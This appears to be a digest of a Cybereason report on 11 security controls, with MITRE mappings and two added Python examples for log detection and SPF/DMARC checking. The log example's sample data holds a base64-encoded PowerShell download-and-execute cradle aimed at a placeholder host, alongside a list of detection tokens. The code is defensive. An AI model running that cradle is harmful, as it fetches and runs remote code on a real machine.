Based on frontline intelligence from over 7,000 incident investigations, Cybereason and partners identified 11 Essential Cybersecurity Controls that most effectively reduce the likelihood, dwell time, and impact of attacks while enabling faster incident response and recovery. The guidance highlights common implementation pitfalls, DFIR-specific benefits, and mappings to major compliance frameworks to help organizations prioritize high-impact defenses. #PhishingResistantMFA #EndpointDetectionAndResponse
Keypoints
- The report distills lessons from 7,000+ incident investigations into 11 prioritized controls shown to materially reduce incident impact and speed response.
- Phishing-resistant MFA, EDR deployment, and Privileged Access Management are emphasized as top controls to block initial access and limit lateral movement.
- Centralized logging, asset inventory, and network segmentation are critical for visibility, accurate scoping, and containment during investigations.
- Regular patching, email security/filtering, and data classification address frequent attacker entry points and help protect high-value data.
- Incident response planning with tabletop exercises and tested, offline backups with RTO validation improve preparedness and recovery capabilities.
- The guidance highlights common pitfalls (e.g., incomplete EDR coverage, weak MFA, untested backups, siloed inventories) that reduce control effectiveness.
- Each control includes DFIR impacts and mappings to CIS, NIST CSF, and NIST 800-171 to align technical measures with compliance and risk management.
MITRE Techniques
- [T1110] Brute Force (Credential Access) – Phishing-resistant MFA (FIDO2/WebAuthn rather than SMS or one-time codes) is recommended because attackers routinely gain access through compromised credentials, and code- or push-based MFA can be relayed by off-the-shelf phishing kits: “attackers routinely gain access through compromised credentials or easily bypass traditional MFA using common phishing kits.”
- [T1078] Valid Accounts – Presence or absence of MFA and PAM affects attacker ability to use valid accounts for lateral movement: “When MFA is weak or missing, lateral movement is easier, privilege escalation is faster, and the blast radius of successful compromises is broader.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – Centralized logging must capture PowerShell script block logs and authentication events, because an investigation stalls wherever those records were never collected: “Critical logs (like PowerShell, authentication events, or cloud admin actions) are often missing.”
- [T1190] Exploit Public-Facing Application / [T1210] Exploitation of Remote Services – Regular patching and vulnerability management reduce initial access through exploited CVEs (T1190 covers internet-facing systems, T1210 the exploitation of internal services after a foothold): “Exploited vulnerabilities consistently appear in the top three initial access methods.”
- [T1566] Phishing – Email security filtering and DMARC/SPF/DKIM enforcement are required because phishing is the top initial intrusion vector: “Phishing and social engineering are the top initial intrusion vector… accounting for 46% of intrusions during H1 2025.”
- [T1071] Application Layer Protocol (Command and Control) and [T1041] Exfiltration Over C2 Channel – EDR telemetry and centralized logs are what let investigators reconstruct command-and-control traffic and data exfiltration: “EDR is often our fastest path to understanding attacker behavior across a networked environment… Centralized logs are our investigation backbone.”
- [T1486] Data Encrypted for Impact (Ransomware) – Offline, immutable, tested backups mitigate ransomware impact and support recovery when backups would otherwise be encrypted: “We frequently see cases where recovery is delayed or impossible because backups were encrypted or deleted by the attacker.”
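The T1110 and T1059 entries above both come down to the same point: the logs have to be collected before anyone can query them. The following is an added example, not code from the Cybereason report, showing what a first-pass query over centralized Windows logs looks like once PowerShell script block events (4104) and failed-logon events (4625) are in place. The events are constructed for illustration; the flattened dict shape, the host names, the address 10.0.8.77 and the URL example.invalid are assumptions of this example, and the final function reports which required event IDs never arrived at all, which is the collection gap the report warns about.

```python
"""Detection pass over centralized Windows logs: failed-logon bursts (T1110) and
encoded PowerShell (T1059.001), plus a check for log sources that never arrived."""
import base64
import re
from collections import defaultdict


def _encoded_arg(script: str) -> str:
    """Build the -EncodedCommand form PowerShell accepts: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, flattened the way a SIEM might normalize Windows
# Security (4625) and PowerShell/Operational (4104) records. Field names follow
# the Windows event XML; the flat dict shape is an assumption for this example.
SPRAY_SOURCE = "10.0.8.77"
SAMPLE_EVENTS = [
    {"EventID": 4625, "Computer": "FS01", "TargetUserName": user, "IpAddress": SPRAY_SOURCE}
    for user in ("svc_backup", "administrator", "jsmith", "mlee", "helpdesk", "sql_svc")
] + [
    # one benign mistyped password from a workstation
    {"EventID": 4625, "Computer": "FS01", "TargetUserName": "jsmith", "IpAddress": "10.0.5.12"},
    {"EventID": 4104, "Computer": "WS-042",
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + _encoded_arg(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"EventID": 4104, "Computer": "WS-042", "ScriptBlockText": "Get-ChildItem C:\\Users -Directory"},
]

# Event IDs an investigation relies on; 4688 is deliberately absent from the sample.
REQUIRED_EVENT_IDS = {
    4625: "failed logon (Security)",
    4104: "PowerShell script block (Microsoft-Windows-PowerShell/Operational)",
    4688: "process creation (Security)",
}

ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
RISKY_TOKENS = ("DownloadString", "IEX", "Invoke-Expression", "FromBase64String", "Net.WebClient")


def decode_encoded_command(script_text: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    match = ENCODED_ARG.search(script_text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_suspicious_powershell(events):
    """Flag 4104 script blocks that are encoded or contain download/eval tokens."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        raw = ev["ScriptBlockText"]
        decoded = decode_encoded_command(raw)
        text = decoded if decoded is not None else raw
        indicators = [t for t in RISKY_TOKENS if t.lower() in text.lower()]
        if decoded is not None:
            indicators.insert(0, "EncodedCommand")
        if indicators:
            hits.append({"Computer": ev["Computer"], "script": text, "indicators": indicators})
    return hits


def find_failed_logon_bursts(events, threshold=5):
    """Group 4625 events by source address; return sources at or above threshold
    with the distinct target accounts, which separates a spray from one typo."""
    by_source = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 4625:
            by_source[ev["IpAddress"]].append(ev["TargetUserName"])
    return {ip: sorted(set(users)) for ip, users in by_source.items() if len(users) >= threshold}


def missing_log_sources(events, required=REQUIRED_EVENT_IDS):
    """Report required event IDs never seen in the feed, i.e. collection gaps."""
    seen = {ev.get("EventID") for ev in events}
    return [f"{eid}: {name}" for eid, name in required.items() if eid not in seen]


if __name__ == "__main__":
    print("failed-logon bursts:", find_failed_logon_bursts(SAMPLE_EVENTS))
    for hit in find_suspicious_powershell(SAMPLE_EVENTS):
        print("suspicious PowerShell on", hit["Computer"], hit["indicators"])
    print("missing log sources:", missing_log_sources(SAMPLE_EVENTS))
```

Run against the sample, the burst check returns the one source that tried six different accounts and ignores the single typo, the PowerShell check decodes the `-enc` payload and surfaces the download cradle that the raw 4104 line hides, and the coverage check reports that process-creation events are not arriving; in a real deployment that last function is the one to schedule, since a missing log source is invisible until someone asks for it.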
Indicators of Compromise
- [Log Events] investigation context – PowerShell logs, authentication events, and cloud admin actions are highlighted as critical logs to collect (e.g., PowerShell execution records, failed authentication attempts).
- [Configuration Settings] security control context – DMARC/SPF/DKIM settings and MFA configuration types (e.g., FIDO2 vs. SMS-based MFA) are cited as security-relevant indicators (example: missing DMARC enforcement, SMS-based MFA enabled).
- [Asset Records] discovery context – Asset inventory entries and unmanaged devices (e.g., legacy endpoints, cloud VMs) are called out as common blind spots (example: unknown cloud VM, unmanaged workstation).
- [Backup State] recovery context – Backup accessibility and immutability status are listed as forensic/recovery indicators (example: backups accessible from production network, backups not immutable or untested).
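The configuration indicators listed above (missing DMARC enforcement, weak SPF) can be checked from DNS alone. The following is an added example, not code from the Cybereason report, that parses SPF and DMARC TXT records and grades them the way an assessor would: it flags a missing record, `p=none` monitoring mode, partial `pct`, an unenforced subdomain policy, and `+all`/`?all` SPF terms. The TXT answers are constructed for three hypothetical domains (good.example, soft.example, open.example); a live check would resolve them with a DNS library instead. DKIM is deliberately not checked, because DKIM selectors cannot be enumerated from DNS without knowing the selector names.

```python
"""Offline check of the mail-authentication indicators called out above: SPF and
DMARC records are parsed from constructed DNS TXT answers and graded."""

# Constructed TXT answers for three hypothetical domains; a real check would
# resolve these (for example with dnspython's dns.resolver.resolve(name, "TXT")).
SAMPLE_TXT = {
    "good.example": ["v=spf1 include:_spf.good.example -all"],
    "_dmarc.good.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@good.example"],
    "soft.example": ["v=spf1 ip4:203.0.113.0/24 ~all"],
    "_dmarc.soft.example": ["v=DMARC1; p=none; rua=mailto:dmarc@soft.example"],
    "open.example": ["v=spf1 +all"],
    # open.example publishes no _dmarc record at all
}

ENFORCING = ("quarantine", "reject")


def parse_dmarc_tags(record: str) -> dict:
    """'v=DMARC1; p=reject; pct=50' -> {'v': 'DMARC1', 'p': 'reject', 'pct': '50'}"""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def spf_findings(domain: str, txt: dict) -> list:
    """Weaknesses in the domain's SPF record (empty list means nothing to report)."""
    records = [r for r in txt.get(domain, []) if r.lower().startswith("v=spf1")]
    if not records:
        return ["SPF: no record published"]
    if len(records) > 1:
        return ["SPF: more than one v=spf1 record, receivers treat this as a permanent error"]
    terms = records[0].split()[1:]
    all_term = next((t.lower() for t in terms if t.lower().lstrip("+-~?") == "all"), None)
    has_redirect = any(t.lower().startswith("redirect=") for t in terms)
    if all_term in ("+all", "all"):
        return ["SPF: +all authorizes every sending host, the record blocks nothing"]
    if all_term == "?all":
        return ["SPF: ?all is neutral, receivers get no pass/fail signal"]
    if all_term is None and not has_redirect:
        return ["SPF: no 'all' mechanism or redirect, unlisted senders default to neutral"]
    return []  # -all (fail) and ~all (softfail, fine when DMARC enforces) both pass


def dmarc_findings(domain: str, txt: dict) -> tuple:
    """Return (findings, enforced); enforced means failing mail is quarantined or rejected."""
    name = f"_dmarc.{domain}"
    records = [r for r in txt.get(name, []) if r.lower().startswith("v=dmarc1")]
    if not records:
        return (["DMARC: no record, receivers apply no policy to spoofed mail"], False)
    tags = parse_dmarc_tags(records[0])
    findings = []
    policy = tags.get("p", "").lower()
    if policy not in ENFORCING:
        findings.append(f"DMARC: p={policy or 'missing'}, monitoring only, spoofed mail is still delivered")
    else:
        sub_policy = tags.get("sp", policy).lower()  # sp defaults to p
        if sub_policy not in ENFORCING:
            findings.append(f"DMARC: sp={sub_policy}, subdomains remain spoofable")
    pct_raw = tags.get("pct", "100")
    pct = int(pct_raw) if pct_raw.isdigit() and int(pct_raw) <= 100 else -1
    if pct < 0:
        findings.append(f"DMARC: pct={pct_raw!r} is not a valid percentage")
    elif pct < 100:
        findings.append(f"DMARC: pct={pct}, policy applied to only part of failing mail")
    if "rua" not in tags:
        findings.append("DMARC: no rua address, aggregate reports are never collected")
    enforced = policy in ENFORCING and pct == 100
    return (findings, enforced)


def assess_domain(domain: str, txt: dict = SAMPLE_TXT) -> dict:
    """Combine both checks. DKIM is not checked: selectors cannot be enumerated from DNS."""
    spf = spf_findings(domain, txt)
    dmarc, enforced = dmarc_findings(domain, txt)
    return {"domain": domain, "spf_findings": spf, "dmarc_findings": dmarc, "dmarc_enforced": enforced}


if __name__ == "__main__":
    for d in ("good.example", "soft.example", "open.example"):
        result = assess_domain(d)
        status = "ENFORCED" if result["dmarc_enforced"] else "NOT ENFORCED"
        print(f"{d}: DMARC {status}")
        for finding in result["spf_findings"] + result["dmarc_findings"]:
            print("  -", finding)
```

On the sample data only good.example comes back enforced; soft.example has a clean SPF record but sits in `p=none` monitoring mode, which is exactly the "missing DMARC enforcement" indicator above, and open.example has neither a usable SPF record nor any DMARC policy. The `~all` softfail is intentionally not flagged: with an enforcing DMARC policy it is a common and acceptable choice, so treating it as a finding would generate noise.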
Read more: https://www.cybereason.com/blog/11-essential-controls